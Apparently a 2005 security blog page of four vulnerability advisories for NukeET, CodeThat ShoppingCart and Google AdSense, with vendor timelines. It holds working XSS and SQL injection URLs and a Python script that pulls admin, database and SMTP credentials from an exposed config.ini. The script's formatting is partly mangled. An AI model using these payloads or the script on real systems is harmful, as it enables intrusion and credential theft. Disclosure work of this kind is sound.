NukeET 'codigo' variable cross site scripting

Tuesday, May 10, 2005
################################################
NukeET 'codigo' variable cross site scripting
vendor url:http://www.truzone.org
advisore:http://lostmon.blogspot.com/2005/05/
nukeet-codigo-variable-cross-site.html
Vendor confirmed : yes exploit available: yes
OSVDB ID:16214
Secunia:15332
BID:13570
Securitytracker:1013936
#################################################

NukeET Contains a flaw too that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'codigo' variable upon submission to the 'security.php'scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a loss
of integrity.

bug found by Suko , investigate and reporter by Lostmon.

##########
versions
##########

prior to 3.2 afected

##########
solution:
##########

vendor patch

http://www.truzone.org/modules.php?name=Projet&op=getit&iddow=77

###########
timeline
###########

discovered: 9 may 2005
vendor notify: 9 may 2005
vendor response : 10 may 2005
vendor fix: 10 may 2005
disclosure: 10 may 2005


##########
exploit:
##########

'codigo' variable acepts base64 url encode ,
if we encode for example:

<script>alert()</script><h1>XSS PoW@ !!!</h1>

in base64 this is:

PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+
PGgxPlhTUyBQb1dAICEhITwvaDE+

if we aded this base64 code the alert and de tag h1
is executed with any problem.
http://[victim]/security.php?codigo=
PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+
PGgxPlhTUyBQb1dAICEhITwvaDE+


################ End ##################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
thnx to Suko "la paciencia es una virtud pekeño Jedy"

--
atentamente:

Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....

CodeThat ShoppingCart Critical information disclosure

Sunday, May 08, 2005
##########################################################
CodeThat ShoppingCart Critical information disclosure
XSS and SQL injection
vendor Url: http://www.codethat.com/shoppingcart/
advisore:http://lostmon.blogspot.com/2005/05/
codethat-shoppingcart-critical.html
vendor notifY: yes exploit available: yes
Discovered By Lostmon And icaro exploit code by icaro
OSVDB ID: 16155 , 16156 and 16157
Secunia:SA15251
BID:13560
Securitytracker:1013924
###########################################################

CodeThat ShoppingCart contains a flaw that may lead to an
unauthorized disclosure of SQL conection data.It is possible
to gain access to plain text SQL configuration details, this
could allow a user to create a specially crafted URL to access
'config.ini' file, which may lead to a loss of confidentiality.
This flaw reveals too the admin´s username and his password
hash.(automated exploit available) and the credential for
configuration of SMTP server.

Contains a flaw too that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'id' variables upon submission to the catalog.php scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a loss
of integrity.

All flaws are found by Lostmon (lostmon@gmail.com)
and icaro (icaro0@gmail.com)and exploit code is coded
by icaro from http://www.badchecksum.tk

##########
versions:
##########

1.3.1

###########
Solution
###########

no solution at this time

############
Timeline
############

discovered: 6 may 2005
vendor notify: 7 mayo 2005
vendor response: 8 mayo 2005 (automated response form spamarrest)
vendor fix
disclosure: 9 may 2005

##########
examples:
####################
Cross site scripting
####################

http://[victim]/codethat/catalog.php?action=category_show
&id=2"><script>alert(document.cookie)</script>

###############
SQL injections
###############

http://[victim]/shoppingcart/catalog.php?action=category_show
&id=1%20or%20like%20%60a%%60

nice SQL error/response ...

umm them try to list all products:

http://[victim]shoppingcart/demo/catalog.php?action=
category_show&id=1%20or%201=1

command execution sucesfully !!!!

aparently, non critical SQL injection ,the data base only have
tree tables and no passwords or other information are stored
in the database.


##############################
Critical information disclosure
Exploit code include.
###############################

A remote user can access directly to SQL user name, password
host, and all details about SQL configuration.

A remote user can access Directly to admin´s user name and password hash.


http://[victim]/shoppingcart/config.ini

##############################
Critical information disclosure.
###############################

A remote user can access directly to SQL user name, password
host, and all details about SQL configuration.

A remote user can access Directly to admin´s user name and password hash.

A remote user can obtain information about SMTP configuration.

http://[victim]/shoppingcart/config.ini

#############################################
Proof of concept automated exploit in Python
exploit url:www.badchecksum.tk/code/shopingfuck.py
#############################################

# Lostmon Dismarking tm && icaro Badchecksum tm
# Extract information tool exploit
# Coded by icaro, Discovered by lostmon && icaro
import httplib
import sys
import string
import socket
import os
def uso():
print '\n\n\nLOSTMON DISMARKING && ICARO BADCHECKSUM TEAM\n'
print 'Usage: python ' + sys.argv[0] + ' host /directory_of_shoping_cart/\n'
print 'Example: python '+ sys.argv[0] +' www.myhost.com /shoping/\n'
def leeini(direccionweb,directorioshoping):
web=httplib.HTTP(direccionweb)
web.putrequest('GET',directorioshoping+'config.ini')
web.putheader('Host',direccionweb)
web.putheader('Accept', 'text/html')
web.putheader('Accept', 'text/plain')
web.endheaders()
errcode, errmsg, headers = web.getreply()
fichero=web.getfile()
datos=fichero.read()
f=open('tmp.txt','w')
f.write(datos)
f.close
f=open('tmp.txt','r')
lineas=f.readlines()
f.close
n=0
print 'EXTRACCION DE PASSWD DE ADMIN SHOPING CART\n'
while n if (string.find(lineas[n],'admin_username'))==0:
imprime=string.replace(lineas[n],'admin_username : string ','Login ')
print imprime
if (string.find(lineas[n],'admin_password'))==0:
imprime=string.replace(lineas[n],'admin_password : string ','Passwd ')
print imprime
n=n+1
n=0
print 'EXTRACCION DE INFORMACION DE BASE DE DATOS\n'
while n if (string.find(lineas[n],'driver : string '))==0:
imprime=string.replace(lineas[n],'driver : string ','Tipo')
print imprime
if (string.find(lineas[n],'server : string '))==0:
imprime=string.replace(lineas[n],'server : string ','Servidor ')
print imprime
if (string.find(lineas[n],'user : string '))==0:
imprime=string.replace(lineas[n],'user : string ','Usuario ')
print imprime
if (string.find(lineas[n],'password : string '))==0:
imprime=string.replace(lineas[n],'password : string ','Passwd ')
print imprime
if (string.find(lineas[n],'database : string '))==0:
imprime=string.replace(lineas[n],'database : string ','Base de datos ')
print imprime
n=n+1
n=0
print 'EXTRACCION DE INFORMACION DEL SERVIDOR SMTP\n'
while n if (string.find(lineas[n],'checkout_email : string '))==0:
imprime=string.replace(lineas[n],'checkout_email : string ','Email
del admin ')
print imprime
if (string.find(lineas[n],'from_name : string '))==0:
imprime=string.replace(lineas[n],'from_name : string ','Nombre')
print imprime
if (string.find(lineas[n],'smtp_host : string '))==0:
imprime=string.replace(lineas[n],'smtp_host : string ','Host ')
print imprime
if (string.find(lineas[n],'smtp_username : string '))==0:
imprime=string.replace(lineas[n],'smtp_username : string ','Usuario ')
print imprime
if (string.find(lineas[n],'smtp_password : string '))==0:
imprime=string.replace(lineas[n],'smtp_password : string ','Passwd ')
print imprime
n=n+1

if len(sys.argv)==3:
leeini(sys.argv[1],sys.argv[2])
os.remove('tmp.txt')
else:
uso()

####################### end ##############

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
thnx to icaro he is with me and investigate.

--
atentamente:

Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....

Google AdSense invite-friend multiple field XSS

Sunday, May 01, 2005
####################################################
Google AdSense invite-fiend multiple field XSS
vendor url:https://www.google.com/adsense/
advisore: http://lostmon.blogspot.com/2005/05/
google-adsense-invite-friend-multiple.html
vendor notify : yes exploit available:yes
#####################################################

Google AdSense is a fast and easy way for website publishers of all
sizes to display relevant Google ads on their website's content
pages and earn money

Google AdSense contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate properly ' Your friend's name',' Your name' ,'Your
email address' and 'Add a personal message' fields upon
submission to the 'previewInvitation()' Function in '/adsense/invite-friend'
scripts.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,leading to a
loss of integrity.

#############
tieline:
#############
discovered: 1 may 2005
vendor notified: 2 may 2005
vendor response: 2 may 2005 ( autoresponder)
vendor response:
fix: not fixed !!!!
disclosure: 5 may 2005

###################
software used
##################

windows 2000 sp4 all fixes
ie 6.0 all fixes
google toolbar 2.0.114.9 big/es
Netcraft toolbar 1.4.1

#################
proof of concept:
#################

Image Example

Go to this address https://www.google.com/adsense/invite-friend
ans insert in fields listed for example:
"><iframe src=http://www.google.com><iframe>
and click in 'preview invite text' link , the iframe is executed
in the texarea on show a preview of the invite with this we can
exploit ' Your friend's name',' Your name' ,'Your email address'
and 'Add a personal message' form fields.

WARNING !!! IF WE LOOK WE ARE IN HTTPS PROTOCOL !!!!!!

(Yet another) Google Cross Site Scripting

############### End ####################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.

Google Adsense multiple variable XSS

Saturday, April 30, 2005
#####################################################
Google Adsense multiple variable XSS
vendor url:https://www.google.com/adsense/?hl=en_US
advisore: http://lostmon.blogspot.com/2005/05/
google-adsense-multiple-variable-xss.html
vendor notify: yes exploit available: yes
######################################################

Google AdSense is a fast and easy way for website publishers of all
sizes to display relevant Google ads on their website's content
pages and earn money

Google AdSense contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate properly 'client' , 'hl' , 'client' , 'adU', 'adT',
'exp' and 'done' variables upon submission to the 'pagead/ads'
and 'feedback/abg' scripts.This could allow a user to create a
specially crafted URL that would execute arbitrary code in a user's
browser within the trust relationship between the browser and the
server,leading to a loss of integrity.

#########
solution:
##########

Aparently all are pached !!!

#############
timeline:
#############

discovered: 28 april 2005
vendor notified: 29 april 2005
vendor response: 29 april 2005 (autoresponder)
vendor response: 30 april 2005 (email)
fix: 30 april 2005
disclosure: 1 may 2005

#################
proof of concept:
#################
I try the ad´s show in Bandaancha.st because
i like the information provide by this web :DDDD
--

###################
software used
##################
windows 2000 sp4 all fixes
ie 6.0 all fixes
google toolbar 2.0.114.9 big/es
Netcraft toolbar 1.4.1
--
in this case the ad´s displayed are "tipical" related shopping carts
--

http://pagead2.googlesyndication.com/pagead/ads?client=%22%3E%3C
script%3Ealert(document.cookie)%3C/script%3Eca-pub-701951298956
4856&dt=1114800478343&lmt=1114800477&format=fp_al_lp
&output=html&channel=8235212864&url=http%3A%2F%2Fwww
.soft32.com%2Fdow nload-publisher-80337-3.html&ref=http%3A%2F
%2Fwww.soft32.com%2Fdownload_80337.html&u_h=768&u_w=
1024&u_ah=740&u_aw=1024&u_cd=32&u_tz=120&u_his
=4&u_java=true&u_nplug=25&u_nmime=93&kw_type=broad
&prev_fmts=180x90_0ads_al_s&rt=ChBCcoJ7AAm3zAoSZDJjsh4zEhl
GcmVlIFBheVBhbCBTaG9wcGluZyBDYXJ0Ggj8cRRPG6sWqA&hl=en

diferent variables afected.

'hl' , 'client' , 'adU', 'adT', 'exp' and ' 'done' aparently afected.

http://services.google.com/feedback/abg?url=http://www.bandaanc
ha.st/index.php&hl="><strong><h1>Lostmon
_was_here!!</h1></strong>es&client=ca-pub-42070770121
30458&adU=www.abeltronica.com&adT=Prueba+Gratis+su+Internet&ad
U=www.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=Marketingy
Comercio.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.
com&adT=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


http://services.google.com/feedback/abg?url=http://www.bandaan
cha.st/index.php&hl=es&client="><strong><h1>
;Lostmon_was_here!!!</h1></strong>ca-pub-4207077012
130458&adU=www.abeltronica.com&adT=Prueba+Gratis+su+Internet&ad
U=www.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=MarketingyCom
ercio.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.co
m&adT=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


http://services.google.com/feedback/abg?url=http://www.bandaanc
ha.st/index.php&hl=es&client=ca-pub-4207077012130458&adU="
><strong><h1>Lostmon_was_here!!!</h1></s
trong>www.abeltronica.com&adT=Prueba+Gratis+su+Internet&adU=w
ww.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=MarketingyComerci
o.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.com&adT
=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


http://services.google.com/feedback/abg?url=http://www.bandaanc
ha.st/index.php&hl=es&client=ca-pub-4207077012130458&adU=www.ab
eltronica.com&adT="><strong><h1>Lostmon_was
_here!!</h1></strong>Prueba+Gratis+su+Internet&adU=
www.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=MarketingyComerc
io.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.com&ad
T=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


(Yet another) Google Cross Site Scripting

################ End #####################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends